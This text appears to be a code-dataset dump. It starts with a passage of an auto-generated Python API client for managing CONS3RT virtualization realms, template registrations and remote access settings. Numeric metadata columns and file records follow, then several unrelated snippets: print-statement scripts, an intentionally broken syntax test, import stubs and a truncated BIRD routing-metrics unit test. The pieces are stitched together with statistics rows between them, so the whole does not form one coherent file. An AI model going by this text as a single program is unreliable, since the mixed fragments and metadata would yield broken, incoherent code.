:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: bool
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.unshare_template_registration_with_http_info(id, registration_id, target_realm_id, **kwargs) # noqa: E501
def unshare_template_registration_with_http_info(self, id, registration_id, target_realm_id, **kwargs): # noqa: E501
"""Unshare Template # noqa: E501
Revokes access to a Template Registration in the specified Virtualization Realm by the provided external Virtualization Realm. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.unshare_template_registration_with_http_info(id, registration_id, target_realm_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: ID of virtualization realm (required)
:param int registration_id: ID of template registration (required)
:param int target_realm_id: ID of external virtualization realm to revoke template registration access for (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(bool, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id', 'registration_id', 'target_realm_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method unshare_template_registration" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `unshare_template_registration`") # noqa: E501
# verify the required parameter 'registration_id' is set
if self.api_client.client_side_validation and ('registration_id' not in local_var_params or # noqa: E501
local_var_params['registration_id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `registration_id` when calling `unshare_template_registration`") # noqa: E501
# verify the required parameter 'target_realm_id' is set
if self.api_client.client_side_validation and ('target_realm_id' not in local_var_params or # noqa: E501
local_var_params['target_realm_id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `target_realm_id` when calling `unshare_template_registration`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
if 'registration_id' in local_var_params:
path_params['registration_id'] = local_var_params['registration_id'] # noqa: E501
query_params = []
if 'target_realm_id' in local_var_params and local_var_params['target_realm_id'] is not None: # noqa: E501
query_params.append(('target_realm_id', local_var_params['target_realm_id'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'Username'] # noqa: E501
return self.api_client.call_api(
'/api/virtualizationrealms/{id}/templates/registrations/{registration_id}/share', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='bool', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def update_template_registration(self, id, registration_id, input_cons3rt_template_data, **kwargs): # noqa: E501
"""Update Template Registration # noqa: E501
Updates the Template Registration for a single Virtualization Realm by the given ID.<br> <br> Note: The state of a Template Registration can only be set to OFFLINE or PUBLISHED.<br> <br> Note: All fields in Template data are honored on update, therefore any configuration that is desired in the updated Registration should be provided. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_template_registration(id, registration_id, input_cons3rt_template_data, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: ID of virtualization realm (required)
:param int registration_id: ID of template registration (required)
:param InputCons3rtTemplateData input_cons3rt_template_data: The modified template registration data (required)
:param bool offline: The desired template registration state
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: bool
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.update_template_registration_with_http_info(id, registration_id, input_cons3rt_template_data, **kwargs) # noqa: E501
def update_template_registration_with_http_info(self, id, registration_id, input_cons3rt_template_data, **kwargs): # noqa: E501
"""Update Template Registration # noqa: E501
Updates the Template Registration for a single Virtualization Realm by the given ID.<br> <br> Note: The state of a Template Registration can only be set to OFFLINE or PUBLISHED.<br> <br> Note: All fields in Template data are honored on update, therefore any configuration that is desired in the updated Registration should be provided. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_template_registration_with_http_info(id, registration_id, input_cons3rt_template_data, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: ID of virtualization realm (required)
:param int registration_id: ID of template registration (required)
:param InputCons3rtTemplateData input_cons3rt_template_data: The modified template registration data (required)
:param bool offline: The desired template registration state
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(bool, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id', 'registration_id', 'input_cons3rt_template_data', 'offline'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method update_template_registration" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `update_template_registration`") # noqa: E501
# verify the required parameter 'registration_id' is set
if self.api_client.client_side_validation and ('registration_id' not in local_var_params or # noqa: E501
local_var_params['registration_id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `registration_id` when calling `update_template_registration`") # noqa: E501
# verify the required parameter 'input_cons3rt_template_data' is set
if self.api_client.client_side_validation and ('input_cons3rt_template_data' not in local_var_params or # noqa: E501
local_var_params['input_cons3rt_template_data'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `input_cons3rt_template_data` when calling `update_template_registration`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
if 'registration_id' in local_var_params:
path_params['registration_id'] = local_var_params['registration_id'] # noqa: E501
query_params = []
if 'offline' in local_var_params and local_var_params['offline'] is not None: # noqa: E501
query_params.append(('offline', local_var_params['offline'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'input_cons3rt_template_data' in local_var_params:
body_params = local_var_params['input_cons3rt_template_data']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json', 'application/xml']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'Username'] # noqa: E501
return self.api_client.call_api(
'/api/virtualizationrealms/{id}/templates/registrations/{registration_id}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='bool', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def update_template_subscription(self, id, subscription_id, input_template_subscription, **kwargs): # noqa: E501
"""Update Template Subscription # noqa: E501
Updates the Template Subscription for a single Virtualization Realm by the given ID.<br> <br> Note: The state of a Template Subscription can only be set to OFFLINE or PUBLISHED.<br> <br> Note: The limits of a Template subscription (CPU, RAM, etc.) cannot exceed the value included in the Registration. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_template_subscription(id, subscription_id, input_template_subscription, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: ID of virtualization realm (required)
:param int subscription_id: ID of template subscription (required)
:param InputTemplateSubscription input_template_subscription: The modified template subscription data (required)
:param bool offline: The desired template subscription state
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: bool
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.update_template_subscription_with_http_info(id, subscription_id, input_template_subscription, **kwargs) # noqa: E501
def update_template_subscription_with_http_info(self, id, subscription_id, input_template_subscription, **kwargs): # noqa: E501
"""Update Template Subscription # noqa: E501
Updates the Template Subscription for a single Virtualization Realm by the given ID.<br> <br> Note: The state of a Template Subscription can only be set to OFFLINE or PUBLISHED.<br> <br> Note: The limits of a Template subscription (CPU, RAM, etc.) cannot exceed the value included in the Registration. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_template_subscription_with_http_info(id, subscription_id, input_template_subscription, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: ID of virtualization realm (required)
:param int subscription_id: ID of template subscription (required)
:param InputTemplateSubscription input_template_subscription: The modified template subscription data (required)
:param bool offline: The desired template subscription state
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(bool, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id', 'subscription_id', 'input_template_subscription', 'offline'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method update_template_subscription" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `update_template_subscription`") # noqa: E501
# verify the required parameter 'subscription_id' is set
if self.api_client.client_side_validation and ('subscription_id' not in local_var_params or # noqa: E501
local_var_params['subscription_id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `subscription_id` when calling `update_template_subscription`") # noqa: E501
# verify the required parameter 'input_template_subscription' is set
if self.api_client.client_side_validation and ('input_template_subscription' not in local_var_params or # noqa: E501
local_var_params['input_template_subscription'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `input_template_subscription` when calling `update_template_subscription`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
if 'subscription_id' in local_var_params:
path_params['subscription_id'] = local_var_params['subscription_id'] # noqa: E501
query_params = []
if 'offline' in local_var_params and local_var_params['offline'] is not None: # noqa: E501
query_params.append(('offline', local_var_params['offline'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'input_template_subscription' in local_var_params:
body_params = local_var_params['input_template_subscription']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json', 'application/xml']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'Username'] # noqa: E501
return self.api_client.call_api(
'/api/virtualizationrealms/{id}/templates/subscriptions/{subscription_id}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='bool', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def update_virt_realm_remote_access_config(self, id, remote_access_config, **kwargs): # noqa: E501
"""Update Remote Access # noqa: E501
Updates the Remote Access configuration for a single Virtualization Realm by the given ID.<br> <br> Note: remoteAccessIpAddress cannot be updated if the Virtualization Realm's Remote Access is currently enabled. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_virt_realm_remote_access_config(id, remote_access_config, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of virtualization realm (required)
:param RemoteAccessConfig remote_access_config: The updated remote access configuration (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: bool
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.update_virt_realm_remote_access_config_with_http_info(id, remote_access_config, **kwargs) # noqa: E501
def update_virt_realm_remote_access_config_with_http_info(self, id, remote_access_config, **kwargs): # noqa: E501
"""Update Remote Access # noqa: E501
Updates the Remote Access configuration for a single Virtualization Realm by the given ID.<br> <br> Note: remoteAccessIpAddress cannot be updated if the Virtualization Realm's Remote Access is currently enabled. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_virt_realm_remote_access_config_with_http_info(id, remote_access_config, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of virtualization realm (required)
:param RemoteAccessConfig remote_access_config: The updated remote access configuration (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(bool, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id', 'remote_access_config'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method update_virt_realm_remote_access_config" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `update_virt_realm_remote_access_config`") # noqa: E501
# verify the required parameter 'remote_access_config' is set
if self.api_client.client_side_validation and ('remote_access_config' not in local_var_params or # noqa: E501
local_var_params['remote_access_config'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `remote_access_config` when calling `update_virt_realm_remote_access_config`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'remote_access_config' in local_var_params:
body_params = local_var_params['remote_access_config']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json', 'application/xml']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'Username'] # noqa: E501
return self.api_client.call_api(
'/api/virtualizationrealms/{id}/remoteaccess', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='bool', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def update_virtualization_realm(self, id, **kwargs): # noqa: E501
"""Update Virtualization Realm # noqa: E501
Updates the content of a single Virtualization Realm with the given ID. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_virtualization_realm(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of virtualization realm (required)
:param InputVRAdminVirtualizationRealm input_vr_admin_virtualization_realm: The updated Virtualization Realm data
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: bool
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.update_virtualization_realm_with_http_info(id, **kwargs) # noqa: E501
def update_virtualization_realm_with_http_info(self, id, **kwargs): # noqa: E501
"""Update Virtualization Realm # noqa: E501
Updates the content of a single Virtualization Realm with the given ID. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_virtualization_realm_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of virtualization realm (required)
:param InputVRAdminVirtualizationRealm input_vr_admin_virtualization_realm: The updated Virtualization Realm data
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(bool, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id', 'input_vr_admin_virtualization_realm'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method update_virtualization_realm" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `update_virtualization_realm`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'input_vr_admin_virtualization_realm' in local_var_params:
body_params = local_var_params['input_vr_admin_virtualization_realm']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json', 'application/xml']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'Username'] # noqa: E501
return self.api_client.call_api(
'/api/virtualizationrealms/{id}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='bool', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def update_virtualization_realm_reachability(self, id, **kwargs): # noqa: E501
"""update_virtualization_realm_reachability # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_virtualization_realm_reachability(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of virtualization realm (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: bool
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.update_virtualization_realm_reachability_with_http_info(id, **kwargs) # noqa: E501
def update_virtualization_realm_reachability_with_http_info(self, id, **kwargs): # noqa: E501
"""update_virtualization_realm_reachability # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_virtualization_realm_reachability_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of virtualization realm (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(bool, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method update_virtualization_realm_reachability" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `update_virtualization_realm_reachability`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/xml']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'Username'] # noqa: E501
return self.api_client.call_api(
'/api/virtualizationrealms/{id}/updatereachability', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='bool', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
| 51.608977
| 357
| 0.621155
| 26,150
| 231,105
| 5.244245
| 0.015641
| 0.044744
| 0.064111
| 0.024939
| 0.978817
| 0.973421
| 0.966348
| 0.961374
| 0.955876
| 0.946769
| 0
| 0.015286
| 0.306168
| 231,105
| 4,477
| 358
| 51.620505
| 0.839961
| 0.455464
| 0
| 0.801576
| 0
| 0
| 0.205508
| 0.076767
| 0
| 0
| 0
| 0
| 0
| 1
| 0.037912
| false
| 0
| 0.002954
| 0
| 0.078779
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
872700c807715d35595ce054fa6343e49a1b0eb4
| 94
|
py
|
Python
|
test.py
|
haohanshi/HackCMU217
|
15df270f4586e3dda76db050060aaae091d34472
|
[
"MIT"
] | null | null | null |
test.py
|
haohanshi/HackCMU217
|
15df270f4586e3dda76db050060aaae091d34472
|
[
"MIT"
] | null | null | null |
test.py
|
haohanshi/HackCMU217
|
15df270f4586e3dda76db050060aaae091d34472
|
[
"MIT"
] | null | null | null |
print("this is for test")
print("this is another test")
print("this is another another test")
| 23.5
| 37
| 0.734043
| 16
| 94
| 4.3125
| 0.375
| 0.391304
| 0.478261
| 0.434783
| 0.637681
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.138298
| 94
| 3
| 38
| 31.333333
| 0.851852
| 0
| 0
| 0
| 0
| 0
| 0.680851
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 8
|
8752b07671fc52f0ec48195d2ea69dfe1ca0c7ac
| 28
|
py
|
Python
|
test/test_syntax_error.py
|
blockpy-edu/skulpt
|
dc70288aedcd7670605ef28f8525546440b39f93
|
[
"MIT"
] | 4
|
2020-01-19T01:42:06.000Z
|
2021-05-13T09:51:38.000Z
|
test/test_syntax_error.py
|
blockpy-edu/skulpt
|
dc70288aedcd7670605ef28f8525546440b39f93
|
[
"MIT"
] | null | null | null |
test/test_syntax_error.py
|
blockpy-edu/skulpt
|
dc70288aedcd7670605ef28f8525546440b39f93
|
[
"MIT"
] | 4
|
2019-10-16T21:50:53.000Z
|
2021-01-11T06:25:57.000Z
|
a = 0
c = 7
print(4
x = 8
| 4
| 7
| 0.428571
| 8
| 28
| 1.5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.25
| 0.428571
| 28
| 7
| 8
| 4
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0.25
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
875b6220efbab778abbca1fc4f7148ae4b4495e9
| 49
|
py
|
Python
|
signup/tests/__init__.py
|
p2pu/mechanical-mooc
|
b57ce2e3a61f4fc5fe4b1c485b2a69429933ebcc
|
[
"MIT"
] | 12
|
2015-01-12T17:26:32.000Z
|
2020-02-19T19:13:18.000Z
|
signup/tests/__init__.py
|
p2pu/mechanical-mooc
|
b57ce2e3a61f4fc5fe4b1c485b2a69429933ebcc
|
[
"MIT"
] | 7
|
2015-01-22T13:09:47.000Z
|
2021-08-22T02:43:06.000Z
|
classphoto/tests/__init__.py
|
p2pu/mechanical-mooc
|
b57ce2e3a61f4fc5fe4b1c485b2a69429933ebcc
|
[
"MIT"
] | 8
|
2015-10-27T22:34:01.000Z
|
2020-04-10T23:15:49.000Z
|
from test_view import *
from test_model import *
| 16.333333
| 24
| 0.795918
| 8
| 49
| 4.625
| 0.625
| 0.432432
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.163265
| 49
| 2
| 25
| 24.5
| 0.902439
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
5e6d2abb95a444daea4416d31391eee55e8ce8ed
| 12,268
|
py
|
Python
|
birdwatcher_test.py
|
kumina/birdwatcher
|
f4b7d673fc972ae195d54b8d0b50661f00ab2c6c
|
[
"BSD-2-Clause"
] | 16
|
2017-02-17T01:02:55.000Z
|
2021-11-14T20:05:16.000Z
|
birdwatcher_test.py
|
kumina/birdwatcher
|
f4b7d673fc972ae195d54b8d0b50661f00ab2c6c
|
[
"BSD-2-Clause"
] | 3
|
2017-06-29T04:43:47.000Z
|
2018-01-11T11:05:47.000Z
|
birdwatcher_test.py
|
kumina/birdwatcher
|
f4b7d673fc972ae195d54b8d0b50661f00ab2c6c
|
[
"BSD-2-Clause"
] | 5
|
2017-02-27T13:50:54.000Z
|
2020-07-30T17:07:14.000Z
|
#!/usr/bin/env python
# Copyright (c) 2016 Kumina, https://kumina.nl/
#
# This file is distributed under a 2-clause BSD license.
# See the LICENSE file for details.
import StringIO
import birdwatcher
import unittest
class TestParseShowProtocols(unittest.TestCase):
def test_static(self):
"""Tests the metrics output for a static route."""
text = '''BIRD 1.5.0 ready.
name proto table state since info
static1 Static master up 2016-10-21
Preference: 200
Input filter: ACCEPT
Output filter: REJECT
Routes: 1 imported, 0 exported, 1 preferred
Route change stats: received rejected filtered ignored accepted
Import updates: 1 0 0 0 1
Import withdraws: 0 0 --- 0 0
Export updates: 0 0 0 --- 0
Export withdraws: 0 --- --- --- 0
'''
self.assertEqual(
list(birdwatcher.parse_show_protocols(StringIO.StringIO(text))),
[('bird_up{bird_protocol_instance="static1"}', 1),
('bird_preference{bird_protocol_instance="static1"}', 200),
('bird_routes{bird_protocol_instance="static1",bird_route_type="imported"}', 1),
